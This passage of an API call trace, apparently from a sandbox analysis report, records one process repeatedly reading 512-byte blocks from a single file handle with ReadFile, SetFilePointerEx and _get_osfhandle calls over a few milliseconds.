lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, 
lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.773] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.773] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.773] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.774] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 
[0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.775] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.775] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.775] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, 
lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 
[0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, 
lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.780] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 
[0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.780] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.780] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.780] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.780] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.780] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
